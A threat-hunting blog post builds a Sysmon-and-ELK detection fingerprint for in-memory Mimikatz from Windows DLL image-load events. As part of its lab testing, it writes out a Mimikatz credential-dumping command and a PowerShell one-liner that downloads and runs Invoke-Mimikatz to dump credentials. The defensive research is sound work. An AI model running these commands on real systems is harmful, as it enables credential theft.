Saturday, March 11, 2017

Chronicles of a Threat Hunter: Hunting for In-Memory Mimikatz with Sysmon and ELK - Part I (Event ID 7)

This post marks the beginning of the "Chronicles of a Threat Hunter" series where I will be sharing my own research on how to develop hunting techniques. I will use open source tools and my own lab at home to test real world attack scenarios.

In this first post, I will show you the beginning of some research I have been doing recently with Sysmon to hunt for Mimikatz when it is reflectively loaded in memory. This technique is used to dump credentials without writing the Mimikatz binary to disk.

  • Invoke-Mimikatz.ps1 Author: Joe Bialek, Twitter: @JosephBialek
  • Mimikatz Author: Benjamin Delpy 'gentilkiwi', Twitter: @gentilkiwi

This first part will cover how we can approach the detection of in-memory Mimikatz by focusing on the specific Windows DLLs it needs to load in order to work, regardless of the process it runs from or whether it touches disk. I will compare the results when Mimikatz is run on disk and in memory to identify the specific DLLs needed in both scenarios. There is an article that takes this same approach, but I feel that it could be improved upon. It is still a good read, and I love the approach. You can read it here.


Requirements:
  • Sysmon installed (I have version 6)
  • Winlogbeat forwarding logs to an ELK Server
  • I recommend reading my series "Setting up a Pentesting.. I mean, a Threat Hunting Lab", especially parts 5 & 6, to help you set up your environment.
  • Mimikatz binary (Version 2.1 20170305)
  • Invoke-Mimikatz
  • notepad++ - Great local editor for your Sysmon configs.

Mimikatz Overview

Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features: mimidrv (a driver to interact with the Windows kernel) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM rights, and often debug rights, in order to perform certain actions and interact with the LSASS process (depending on the action requested) [Source]. Mimikatz comes in two flavors, x64 or Win32, depending on your Windows version (32- or 64-bit). The Win32 flavor cannot access 64-bit process memory (like lsass), but it can open 32-bit minidumps under 64-bit Windows. It is now well known for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash and pass-the-ticket, or build Golden Tickets. [Source]

In-Memory Mimikatz

What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory [Source]. However, it needs other native Windows DLLs loaded on disk in order to do its job.

Event ID 7: Image loaded

The image loaded event logs when a module is loaded in a specific process. This event is disabled by default and needs to be configured with the –l option. It indicates the process in which the module is loaded, hashes and signature information. The signature is created asynchronously for performance reasons and indicates if the file was removed after loading. This event should be configured carefully, as monitoring all image load events will generate a large number of events. [Source]

Getting ready to hunt for Mimikatz

Getting a Sysmon Config ready

The main goal is to monitor "Image Loaded" events when Mimikatz gets executed. However, we first have to make sure that we understand what "normal" looks like. Therefore, the first thing I recommend doing is to monitor images loaded by the process that will be executing Mimikatz in its two forms (the Mimikatz binary and Invoke-Mimikatz). We will test Mimikatz on disk first. This first step of logging images loaded by the process executing Mimikatz will be more helpful when we test the Invoke-Mimikatz script, but it is a good exercise for understanding the testing methodology.

The process that I used for this first test was "PowerShell.exe", so I created a basic Sysmon configuration to only log images loaded by this process. It is available on GitHub as shown below.

Download and save the Sysmon config in a location of your choice as shown in Figure 1 below.

Figure 1. Saving custom sysmon config.
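For reference, a minimal config along these lines might look like the following. This is a sketch of the idea, not necessarily the exact file from the repo, and the schemaversion value depends on your Sysmon build:

```xml
<Sysmon schemaversion="3.30">
  <EventFiltering>
    <!-- Event ID 7: log module loads only when powershell.exe is the loading process -->
    <ImageLoad onmatch="include">
      <Image condition="end with">powershell.exe</Image>
    </ImageLoad>
  </EventFiltering>
</Sysmon>
```

The "include" match means only image loads whose process Image ends with powershell.exe will be logged, which keeps the event volume manageable for this test.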

Update your Sysmon rules configuration. To do this, make sure you run cmd.exe as administrator and use the configuration you just downloaded as shown in figure 3 below. Run the following command:

Sysmon.exe -c [Sysmon config xml file]

Then, confirm that your new config is running by typing the following:

sysmon.exe -c   (You will notice that the only things being logged will be Images loaded by "PowerShell" as shown in figure 3 below.)

Figure 2. Running cmd.exe as an Administrator.

Figure 3. Updating your Sysmon rules configuration. 

You should be able to open your Event Viewer and verify that the last event logged by Sysmon was Event ID 16, which means that your Sysmon config state changed. You should not get any other events after that unless you launch PowerShell. If you do, try to update your config one more time as shown in figure 3 above.

Figure 4. Checking Sysmon logs with the Event Viewer console.

Delete/Clean your Index 

If you open your Kibana console and filter your view to show only Sysmon logs, you will see old records that were sent to your ELK server before you updated your Sysmon config. To be safe and make sure you don't have old image loads that might interfere with your results, I recommend deleting/clearing your index by running the following command as shown in figure 6 below:

curl -XDELETE 'localhost:9200/[name of your index]?pretty'

If you are using my Logstash configs, an index gets created as soon as data is passed to Elasticsearch.

Figure 5. Old Sysmon logs displayed on your Kibana console.

Figure 6. Clearing contents of your main Index. (Clearing Logs)

Now, if you refresh your view (filtering only to show Sysmon logs again), you should not see anything unless you execute PowerShell.

Figure 7. No Sysmon logs in ElasticSearch yet.

Create a Visualization for "ImageLoaded" events

I do this so that I can group events and visualize data properly instead of using the event viewer. To get started do the following:

  • Click on "Visualize" on the left panel
  • Select "Data Table" as your visualization type

Figure 8. Creating a new visualization. Data Table type.

Select the index you want to use (In this case, the only one available is Winlogbeat)

Figure 9. Selecting the right index for the visualization.

As shown in figure 10 below:

  • Select the "Split Rows" bucket type
  • Select the aggregation type "Terms"
  • Select the data field for the visualization (event_data.ImageLoaded.keyword)
  • By default data will be ordered "Descending".
  • Set the number of records to show to "200" (We do this to make sure we show all the modules being loaded)

Figure 10. Creating visualization.

Click on "Options" and set the "Per Page" value to show 20 results per page. Remember, we set this visualization to show the top 200 records in figure 10 above, and now 20 records per page. If you end up with 10 full pages of records, you might want to increase the number of records shown beyond 200, since you might not be seeing all the results.

Figure 11. Setting visualization options.

Give a name to your new visualization and save it.

Figure 12. Saving visualization.

Figure 13. Saving visualization.

Creating a simple dashboard to add our visualization

To get started do the following:

  • Click on "Dashboard" on the left panel. (Figure 14)
  • Click on "Add" on the options above your Kibana search bar. (Figure 15)

Figure 14. Creating a new dashboard.

Select the visualization we just created for Images loaded. This will add the visualization to your dashboard.

Figure 15. Adding our new visualization.

Figure 16. Visualization added to our new dashboard.

Save your new dashboard:

  • Click on "Save" between the options "Add" and "Open".
  • Give your dashboard a name and save it.

Figure 17. Saving new dashboard.

Figure 18. Saving new dashboard.

Testing/Logging Images loaded by PowerShell

As I stated before, if we want to detect anomalies, we have to first understand what normal looks like. Therefore, in this section, we will find out what images get loaded when PowerShell is launched in order to start creating a baseline.

To get started, launch PowerShell and close it.

Figure 19. Opening PowerShell.

Next, refresh your dashboard by clicking on the magnifying glass icon located to the right of the Kibana search bar. You will see that several images/modules were loaded when PowerShell executed, as shown in figure 20 below.

Figure 20. Logging Images loaded by PowerShell.

If we go to our last page, page #4, we can see that there are 12 results at 20 results per page. This means we have 3 pages with 20 records and 1 with 12. Therefore, we can say that PowerShell loads 72 images when we open and close it.

Figure 21. Logging Images loaded by PowerShell.

Now, to verify that PowerShell loads 72 images most of the time, I opened and closed PowerShell 4 more times as shown in figure 22 below.

Figure 22. Opening and closing PowerShell 4 times.

Once you refresh your dashboard again, you will see the same images being loaded, with the count of each image increased by 4. We now see a count of 5 for every single unique image loaded: a total, again, of 72 unique images, each loaded 5 times. Up to this point, it is clear that PowerShell only loads 72 images when it starts with its basic (default) functionality. We are now ready to test Mimikatz on disk.

Figure 23. Images loaded by PowerShell after being opened and closed 4 more times.

Figure 24. Images loaded by PowerShell after being opened and closed 4 more times.

Detecting Mimikatz on Disk

Download the latest Mimikatz Trunk

Our first test will be running the Mimikatz binary available here as shown in figure 25.

Figure 25. Downloading Mimikatz binaries.

Download and save your Mimikatz folder in a location of your choice as shown in figure 26 below. I show you this because it is important that you remember the exact path of the Mimikatz binary you will use for the first test. We will need the path to update our Sysmon config and log the images loaded by the Mimikatz binary.

Figure 26. Downloading Mimikatz binaries.

Edit and Update your Sysmon config

Add another rule to the configuration we used earlier. Open the config with notepad++ and add another "Image" rule specifying the path to mimikatz.exe as shown in figure 28.

Figure 27. Editing our Sysmon config.

Figure 28. Editing our Sysmon config.
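The updated rule might look something like this sketch. The full path is the one used later in this post (C:\Tools\mimikatz_trunk); adjust it to wherever you saved the binary:

```xml
<ImageLoad onmatch="include">
  <Image condition="end with">powershell.exe</Image>
  <!-- also log modules loaded by the Mimikatz binary itself -->
  <Image condition="is">C:\Tools\mimikatz_trunk\x64\mimikatz.exe</Image>
</ImageLoad>
```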

Open cmd.exe as administrator and run the following command as shown in figure 29 below:

sysmon.exe -c [edited sysmon xml file]

Then, confirm that the changes were applied by running the following command:

sysmon.exe -c   (You will see that our new rule now shows up below our PowerShell one)

Figure 29. Updating Sysmon rule configuration.

TIP: Extend the Time Range of your Dashboard

Remember that by default your dashboard is set to show the last 15 minutes of data stored in Elasticsearch. I always extend my time range (to 30 minutes or more) to make sure I still see logs that were captured more than 15 minutes ago (that is sometimes how long it takes me to do all the extra steps to get ready, or I simply get distracted). It depends on how much time you take between each update or change you make to your config or strategy. You just want to make sure that your time range is right so that you capture all your results.

Figure 30. Extending the time range of your dashboard.

Running Mimikatz on Disk

Now that we have everything ready, let's first run PowerShell as Administrator. If you refresh your dashboard, the count of almost every single image/module will have increased by 1 as shown in figure 32 below.

Figure 31. Running PowerShell as Administrator.

Figure 32. PowerShell opened as Administrator.

Now, it is really important to make sure we do not load extra images that could be mixed in with the modules loaded by the Mimikatz binary. Before running Mimikatz, I wanted to show you what happens when you fat-finger a command in PowerShell. Yes, it actually loads an image named diasymreader.dll as shown in figure 34 below. Therefore, if you fat-finger the arguments while executing Mimikatz, make sure you do not count diasymreader.dll as part of your results.

Figure 33. Testing  wrong arguments in PowerShell

It is also important to mention that PowerShell loads netutils.dll when the console closes. Since we are not closing our PowerShell console yet, you will still see netutils.dll with a count of 5 and not 6. We are using our high-integrity PowerShell process to run Mimikatz, so we can't close it yet.

Figure 34. Extra image loaded by PowerShell after executing wrong arguments.

It is time to test our Mimikatz binary. Change your directory to the one where the Mimikatz binary is stored (I used the x64 one). Launch the following command and then close your PowerShell console:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Figure 35. Running Mimikatz on disk.

Next, refresh your dashboard. You will see that the count for every single image on page 1 increased by 1. That means that Mimikatz also loads those images when it executes. This is an important first finding, because those first images might not be unique enough to be used to fingerprint Mimikatz.

Figure 36. Images loaded after executing Mimikatz on disk.

If you go to page #4, you will start to see a few unique images loaded by Mimikatz (remember that diasymreader.dll was not loaded by Mimikatz). You can also see that the image mimikatz.exe was loaded 4 times, by PowerShell of course.

Figure 37. Images loaded after executing Mimikatz on disk.

If you go to the next page, page #5, you can see the last unique images loaded by Mimikatz. This is good for this exercise because we now have at least a basic understanding of the, so far, unique images loaded by Mimikatz when executed on disk.

Figure 38. Images loaded after executing Mimikatz on disk.

What if I want to see images loaded by Mimikatz only?

What I like about using Kibana is that I can filter out or group data records with unique characteristics. Let's say you want to select only images loaded by mimikatz.exe. We will have to create an extra visualization and add it to our dashboard. You could also type a query in the Kibana search bar to accomplish that, but I prefer to have an extra visualization that I can interact with too (good exercise).

As explained before, in order to create a visualization, click on Visualize on the left panel, and it will automatically take you to edit the only visualization that we have in our dashboard. Next, click on "New" to create a new visualization as shown in figure 39 below.

Figure 39. Creating a new visualization.

Select Data Table for the visualization type and Winlogbeat for the index.

Figure 40. Creating a new visualization.

For this visualization, do the following:

  • Set the field to event_data.Image.keyword
  • Give it a name and save it

Figure 41. Creating a new visualization.

Figure 42. Saving the new visualization.

Click on Dashboard on the left console, and add the new visualization to your dashboard as shown in figure 43 below.

Figure 43. Adding visualization to dashboard.

You will see that we now have better numbers per image (PowerShell.exe & mimikatz.exe). You can see that PowerShell loaded 437 images overall. That makes sense: we know it loads 72 images every time it opens and closes, and we used it 6 times, which gives us 432 images. PowerShell also loaded one extra image when I showed you what happens when you fat-finger a command, bringing us to 433. Add the 4 mimikatz.exe image loads that occurred when we used PowerShell to execute the Mimikatz binary, and we get our 437 images loaded as shown in figure 44.

Figure 44. New visualization added to dashboard.

Then, what you can do with this new visualization is to click on the Image "C:\Tools\mimikatz_trunk\x64\mimikatz.exe" and it will automatically create a filter to show only the images loaded by your selection as shown in figure 46 below.

Figure 45. Images loaded only by PowerShell and Mimikatz.

Figure 46. Images loaded only by Mimikatz.

Figure 47. Images loaded only by Mimikatz.

You can also download all the results of the Images_Loaded visualization by clicking on the "Formatted" option below the data table results. That will allow you to export all the results in CSV format. Save it and open it to highlight a few things.

Figure 48. Exporting results of images loaded in a CSV format.

Figure 49. Saving CSV file.

Open the file and highlight the unique images that were loaded by Mimikatz when it was run on disk. That will help you document your results. So far, we can consider the highlighted images to be our initial fingerprint for Mimikatz. That will change, of course, once you start collecting modules loaded by other programs and comparing results.

Figure 50. Result of images loaded after executing Mimikatz on disk.

Detecting In-memory Mimikatz

Delete/Clean your Index

Our next test will be launching Mimikatz reflectively in memory. To get started, delete/clear your index as shown in figure 51 below.

Figure 51. Deleting Index.

Refresh your dashboard to confirm that the index was deleted/cleared.

Figure 52. Empty Dashboard.

Getting ready to run Invoke-Mimikatz

Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. [Source]

Figure 53. Empire's latest Invoke-Mimikatz script.

Figure 54. Empire's latest Invoke-Mimikatz script.

As shown before in figure 22 when we were getting ready to run the mimikatz binary, we want to make sure that we have a basic baseline of images/modules being loaded by PowerShell when it is opened and closed. Open and close PowerShell 4 times as shown in figure 55 below.

Figure 55. Opening and closing PowerShell 4 times.

We can see the same 72 images being loaded 4 times. It should show a total of 288, but there might have been a delay getting it to the server. I probably refreshed my dashboard too soon and did not capture the last netutils.dll load, which happens when PowerShell exits. Anyway, I think we have a good basic baseline before running Mimikatz reflectively in the same PowerShell process.

Figure 56. Images loaded by PowerShell before running Mimikatz.

Baselining how PowerShell will download Invoke-Mimikatz

The easiest way to test Invoke-Mimikatz is by going to its GitHub repo and downloading it before executing it in memory. We have to make sure that we understand what extra images PowerShell needs to load in order to perform network operations and download Invoke-Mimikatz as a string. We can use the same approach of opening and closing PowerShell, running only the commands that pull the script as a string from GitHub, without executing it yet, as shown in figure 57 below.

IEX (New-Object Net.WebClient).DownloadString('')

Figure 57. Running commands to only download Invoke-Mimikatz.

Next, refresh your dashboard and, as you already know, most of the unique image counts will have increased by one as shown in figure 58 below.

Figure 58. Checking initial images loaded by PowerShell to download Invoke-Mimikatz from Github.

Now, if you go to page #4, you will start to see new unique images/modules. Those are images loaded by PowerShell to perform the "DownloadString" operation. You can go to page #5 too, as shown in figure 60, and you will see more unique images. (You can expand your first visualization to see the long paths of a few images. The second visualization we added to the dashboard earlier will just move down.)

Figure 59. Unique Images loaded by PowerShell to download Invoke-Mimikatz from Github.

Figure 60. More unique images loaded by PowerShell to download Invoke-Mimikatz from Github.

Then, we can perform the same operation (downloading Invoke-Mimikatz from GitHub as a string) a few more times to make sure we have a strong fingerprint for that particular action and avoid mixing it with images loaded when Mimikatz is executed in memory. I opened PowerShell three times, executed the same commands to only download Invoke-Mimikatz as a string, and closed the consoles, as shown in figure 61.

Figure 61. Downloading Invoke-Mimikatz as a string three times.

Then, you will see that the counts for the initial images loaded by PowerShell increased by 3, but if you go to page #5, as shown in figure 63, you can see our "DownloadString" images loaded 4 times.

Figure 62. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times.

Figure 63. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times.

Running Mimikatz in Memory

To get started, run PowerShell as Administrator.

Figure 64. Running PowerShell as Administrator.

In order to download Invoke-Mimikatz as a string from Github and run it in memory, type the following commands:

IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds

Figure 65. Running Mimikatz in memory.

You will of course get the same results as when it was run on disk. Close your PowerShell console.

Figure 66. Results from running Mimikatz.

Analyzing In-Memory Mimikatz Results

After closing PowerShell, refresh your dashboard (make sure you have the right time range), and you will see that the initial default images loaded by PowerShell increased by only 1, not by 2 as when we ran Mimikatz on disk. This is because the Mimikatz binary runs reflectively inside of PowerShell, and several of the modules it needs are already loaded by PowerShell itself.

Figure 67. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

Next, if you go to page #5, you will see that the images loaded during the "DownloadString" operation increased by one (count of 5 now as expected). In addition, we can see one of the images that was also loaded while executing Mimikatz on disk:
  • C:\Windows\System32\WinSCard.dll

However, there are four new images that were loaded when Mimikatz was executed reflectively in memory. (I will explain later why those get loaded when we run Invoke-Mimikatz)

  • C:\Windows\System32\whoami.exe
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll
  • C:\Windows\System32\NapiNSP.dll
  • C:\Windows\System32\RpcRtRemote.dll

Figure 68.  Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

On page #6, we can also see a few new images that we did not see when Mimikatz ran on disk. (I will explain later why those get loaded when we run Invoke-Mimikatz).
  • C:\Windows\System32\nlaapi.dll
  • C:\Windows\System32\ntdsapi.dll
  • C:\Windows\System32\pnrpnsp.dll
  • C:\Windows\System32\wbem\fastprox.dll
  • C:\Windows\System32\wbem\wbemprox.dll
  • C:\Windows\System32\wbem\wbemsvc.dll
  • C:\Windows\System32\wbem\wmiutils.dll
  • C:\Windows\System32\wbemcomn.dll
  • C:\Windows\System32\winrnr.dll

However, we can also see most of the remaining images that were loaded when Mimikatz was executed on disk.

  • C:\Windows\System32\apphelp.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\logoncli.dll
  • C:\Windows\System32\netapi32.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll
  • C:\Windows\System32\wintrust.dll
  • C:\Windows\System32\wkscli.dll

I don't see the following modules (loaded by Mimikatz on disk) as unique ones anymore (count 1). This is because they are used to handle encryption and were part of the "DownloadString" operation baselining. We handled encrypted traffic with GitHub, so it makes sense. It is safe to say that these modules will be noisy (which does not mean they do not get loaded while running Mimikatz in memory; it is just that PowerShell loads them first to handle the encrypted traffic).

  • C:\Windows\System32\bcrypt.dll
  • C:\Windows\System32\bcryptprimitives.dll
  • C:\Windows\System32\ncrypt.dll

 Figure 69. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

You can reduce the width of the first visualization, and the second one we added earlier should move back up next to it. This is just so you can see the total number of images loaded by PowerShell at the end of this test.

 Figure 70. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

In order to document your findings, export the results to a CSV file by clicking on the option "formatted" below the "Images_Loaded" results, and save it to your computer as shown in figure 71.

 Figure 71. Exporting results to a CSV file.

Comparing Results

As we can see in figure 72 below, it does not matter whether Mimikatz is executed on disk or in memory; it still loads the same extra modules it needs in order to work. Most of the modules Mimikatz needs are already loaded by PowerShell, depending on what happens before the script runs, but we can still see a few unique ones that could allow us to create a basic fingerprint for in-memory Mimikatz. For example, if we take out the 3 modules used for encryption, we can use the other 10 to create a basic detection rule. We could hunt by grouping the following modules being loaded within a one- to four-second time bucket:

  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\apphelp.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\logoncli.dll
  • C:\Windows\System32\netapi32.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll
  • C:\Windows\System32\wintrust.dll
  • C:\Windows\System32\wkscli.dll

Figure 72. Comparing results on-disk and in-memory.
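To make the grouping idea concrete, here is a small Python sketch of the time-bucket logic (my own illustration, not part of the post's tooling; the `hunt_image_loads` name and the `(timestamp, path)` event shape are assumptions for this example):

```python
from datetime import datetime, timedelta

# The 10-module fingerprint derived above (file names only).
FINGERPRINT = {
    "winscard.dll", "apphelp.dll", "cryptdll.dll", "hid.dll",
    "logoncli.dll", "netapi32.dll", "samlib.dll", "vaultcli.dll",
    "wintrust.dll", "wkscli.dll",
}

def hunt_image_loads(events, window_seconds=4):
    """events: iterable of (datetime, image_path) Sysmon Event ID 7 records.
    Returns True if every fingerprint module is loaded inside one window."""
    # Keep only fingerprint module loads, ordered by timestamp.
    hits = sorted(
        (ts, path.lower().rsplit("\\", 1)[-1])
        for ts, path in events
        if path.lower().rsplit("\\", 1)[-1] in FINGERPRINT
    )
    window = timedelta(seconds=window_seconds)
    # Slide the window start over each hit and check for a complete set.
    for i, (start, _) in enumerate(hits):
        seen = {name for ts, name in hits[i:] if ts - start <= window}
        if seen == FINGERPRINT:
            return True
    return False
```

In ELK itself, the equivalent grouping could be done with a date histogram aggregation; the sketch above just shows the core idea of requiring all 10 loads inside one short window.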

What about whoami.exe?

We could add that to our basic in-memory Mimikatz fingerprint. If an adversary is using the exact Invoke-Mimikatz script from the Empire project, it will reduce the number of false positives. The whoami part is defined in the main function of Invoke-Mimikatz, as you can see in figure 73 below. It is important to note that Invoke-Mimikatz from PowerSploit does not have this command in the script.

Figure 73. Whoami utilized in Invoke-Mimikatz.

What about the modules loaded from the wbem directory and WMINet_Utils?

All that is part of Windows Management Instrumentation (WMI) technology. It provides access to monitor, command, and control any managed object through a common, unifying set of interfaces, regardless of the underlying instrumentation mechanism. WMI is an access mechanism.[Source]. 

But why do they get loaded when we run Mimikatz in memory? It is because of a simple command used in the Invoke-Mimikatz script to verify that the PowerShell architecture (32-bit/64-bit) matches the OS architecture. Most of the modules in question pointed to WMI activity, so I went to the code and looked for any signs of WMI.

Invoke-Mimikatz uses the command "Get-WmiObject" and the class "Win32_Processor" to find out information about the CPU and to get the "AddressWidth" value which is used to verify the OS Architecture as shown in figure 74 below.

Figure 74. WMI in Invoke-Mimikatz.

So I tested that command on my computer and logged all the modules being loaded by PowerShell. I refreshed my dashboard and saw that all the modules in question were loaded while executing the following command:

get-wmiobject -class Win32_Processor

Figure 75. Executing get-wmiobject with class Win32_Processor to get information about the CPU.

Figure 76. Images loaded after using WMI.

I want to point out that the following modules can generate a lot of false positives, since they can be triggered by simple Office applications (x86/x64) and the use of Internet browsers such as Internet Explorer, as shown in figure 77 below:
  • C:\Windows\System32\nlaapi.dll
  • C:\Windows\System32\ntdsapi.dll

Figure 77. Images loaded after using WMI.

In addition, in my opinion, depending on how much WMI is used in your environment, it might be a good idea to start monitoring for at least:
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll
You can test that in your environment and see how noisy it gets. Look for WMINet_Utils.dll across the .NET versions available in your gold image.

On the other hand, most of the remaining modules are loaded by several third-party and built-in applications, so they are too noisy and could cause a large number of false positives:

  • C:\Windows\System32\nlaapi.dll
  • C:\Windows\System32\ntdsapi.dll
  • C:\Windows\System32\pnrpnsp.dll
  • C:\Windows\System32\wbem\fastprox.dll
  • C:\Windows\System32\wbem\wbemprox.dll
  • C:\Windows\System32\wbem\wbemsvc.dll
  • C:\Windows\System32\wbem\wmiutils.dll
  • C:\Windows\System32\wbemcomn.dll
  • C:\Windows\System32\winrnr.dll

So far, our detection strategy is still to look for the following 10 modules:
  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\apphelp.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\logoncli.dll
  • C:\Windows\System32\netapi32.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll
  • C:\Windows\System32\wintrust.dll
  • C:\Windows\System32\wkscli.dll

How can we test our group of modules and tune it to reduce false positives?

Before thinking about deploying a detection rule like this in your production Sysmon config, I highly recommend getting a gold image and logging every single module loaded by every process or application on the system. I tested this in my own environment at home.

Edit and Update your Sysmon config

Open the Sysmon configuration we used for our initial tests and set it to not exclude anything from Event ID 7 - Image Load (log everything) as shown in figure 79 below.

Figure 78. Editing current sysmon config.

Figure 79. Editing current sysmon config.
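The relevant part of the config would then look something like this sketch. An empty "exclude" rule means nothing is filtered out, so every Event ID 7 record on the box gets logged:

```xml
<EventFiltering>
  <!-- exclude nothing: every image load is logged -->
  <ImageLoad onmatch="exclude">
  </ImageLoad>
</EventFiltering>
```

Expect a large event volume with this setting; it is meant for baselining on a test box, not for production.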

Open cmd.exe as administrator and run the following command as shown in figure 80 below:

sysmon.exe -c [edited sysmon xml file]

Then, confirm that the changes were applied by running the following command:

sysmon.exe -c   (You will see that now everything for ImageLoad is being logged)

Figure 80. Updating Rule configurations.

Open several applications

We are now logging every single image loaded on our system on top of our Invoke-Mimikatz findings (DO NOT DELETE/CLEAR YOUR INDEX). We can now open and close applications that a user would most likely use in an organization (depending on the type of job) as shown in figure 81.

Figure 81. Open applications on your testing machine.

Make sure you also have the right time range assigned to your dashboard, since we are still using the logs we gathered when we ran Invoke-Mimikatz. I set mine to "Last 1 hour" as shown in figure 82.

Figure 82. Adjusting Time Range.

Refresh your dashboard and you will see a lot of modules being loaded, as shown in figure 83 below. You can adjust your visualizations if you want to; that will allow you to see more than 200 images loaded on your box (200 is how many records we set our Images_Loaded visualization to show).

Figure 83. Several images being loaded.

Hunt for the group of 10 modules

Next, with all that data, we can query for the 10 modules of our initial in-memory Mimikatz fingerprint as shown in figures 84 and 85 below.

"WinSCard.dll", "apphelp.dll", "cryptdll.dll", "hid.dll", "logoncli.dll", "netapi32.dll", "samlib.dll", "vaultcli.dll", "wintrust.dll", "wkscli.dll"
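In the Kibana search bar, a query for those modules can be approximated with a Lucene expression along these lines. The field name `image_loaded` is an assumption based on a common Winlogbeat/Sysmon field mapping; substitute whatever field your index actually uses for the loaded image path.

```
event_id:7 AND image_loaded:(*WinSCard.dll OR *apphelp.dll OR *cryptdll.dll
  OR *hid.dll OR *logoncli.dll OR *netapi32.dll OR *samlib.dll
  OR *vaultcli.dll OR *wintrust.dll OR *wkscli.dll)
```

Note that leading wildcards can be expensive on large indices, so you may want to scope the query to a narrow time range first.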

You will see that 5 out of the 10 modules are still unique to our basic fingerprint (most of them are used to manage authentication security components and features of the system), as shown in figure 84 below:
  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll

You might be wondering why netapi32.dll is not included. It was actually loaded two more times, which does not mean it is not a common binary needed for authentication support; however, since it seems to be used by a few other applications, I would rather filter it out.

Figure 84. Querying for only In-memory Mimikatz fingerprint.

If you want to know which modules/images are being loaded by a specific image in the EventID7_Images visualization, click on one of them and a filter will be created to show you only the images loaded by your selection. For example, Excel apparently loads apphelp.dll and wintrust.dll from our list of 10, as shown in figure 85 below.

Figure 85. What is loading what?

Or, vice versa, you can click on the loaded image and it will filter everything out to show you the images that loaded that specific module, as shown in figure 86.

Figure 86. What is loading what?

What about other operations where Authentication components are involved?

I cleaned/deleted my index and started paying attention to authentication operations, such as logging onto web applications or onto my computer after rebooting it.

Logging onto the Kibana Web Interface

I opened IE, and the first two modules out of the 10 that got loaded were wintrust.dll and apphelp.dll. Then I browsed to my ELK server's IP address and got a prompt to enter my credentials. I noticed that for IE to do all this, it needed to load 5 out of the 10 modules needed by Mimikatz, as shown in figure 87 below. Three of those five are still part of the ones required for authentication support:

  • samlib.dll
  • WinSCard.dll
  • vaultcli.dll

Figure 87. Images loaded by IE while authenticating to Kibana.

Logging onto my system after rebooting it

The processes shown in figure 88 below are the first processes started when a system boots up (the ones with grayed-out icons are processes that have already exited).

Figure 88. Images loaded by the first processes that get started by your system when it boots up.

So what happens when we look for the 5 modules that, so far, are considered the combination with the fewest false positives against the processes shown in figure 88?

"WinSCard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll"

As you can see in figure 89 below, there were hits for all of them, but only from processes involved in authentication. The one with the most hits was "LogonUI.exe".

Figure 89. "Credential Providers" modules used by a few processes.

While conducting research on that particular process (LogonUI.exe) for a training class I put together for some colleagues, I found the following:

"Whenever a user hits Ctrl-Alt-Del, winlogon.exe switches to another desktop and launches a special program, logonui.exe, to interact with the user. The user may be logging on initially, (un)locking the desktop, changing her password or some other task, but the user is interacting with logonui.exe on a special desktop, not winlogon.exe on the default desktop. When authenticating, logonui.exe loads DLLs called "credential providers" which can handle the password, smart card or, with a third-party provider, biometric information, to authenticate against the local SAM database, Active Directory, or some other third-party authentication service." [Source]

Therefore, all 5 of those modules being loaded together by other processes handling credentials makes sense. We could use this knowledge to filter out a few processes where one would normally enter credentials to authenticate to a service or application. For example, processes such as Chrome, IE, or even Outlook (known for asking for your password 50 times a day) would load those modules. SSO via your browser would also load most of those images.

Final Thoughts

Even though this is just part I of detecting in-memory Mimikatz, we are already coming up with a basic fingerprint that will allow us to reduce the number of false positives when hunting for this tool executed in memory.

Based on the number of tests performed, a basic fingerprint for In-memory Mimikatz from a modules perspective could be:
  • C:\Windows\System32\WinSCard.dll
  • C:\Windows\System32\cryptdll.dll
  • C:\Windows\System32\hid.dll
  • C:\Windows\System32\samlib.dll
  • C:\Windows\System32\vaultcli.dll

If you can afford (enough space) to log one more image being loaded in your environment, I think it would be a good idea to monitor the following module. I only saw it being loaded by PowerShell after launching several other applications and logging all the modules being loaded.

  • C:\Windows\Microsoft.NET\Framework64\[Versions available]\WMINet_Utils.dll
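If you would rather log only these specific modules in production (instead of every image load), a hedged sketch of a Sysmon `include` rule for the fingerprint might look like the following. Again, the schema version is an assumption; verify it against your Sysmon install before deploying.

```xml
<Sysmon schemaversion="3.30">
  <EventFiltering>
    <!-- onmatch="include": only log image loads matching these rules -->
    <ImageLoad onmatch="include">
      <ImageLoaded condition="end with">WinSCard.dll</ImageLoaded>
      <ImageLoaded condition="end with">cryptdll.dll</ImageLoaded>
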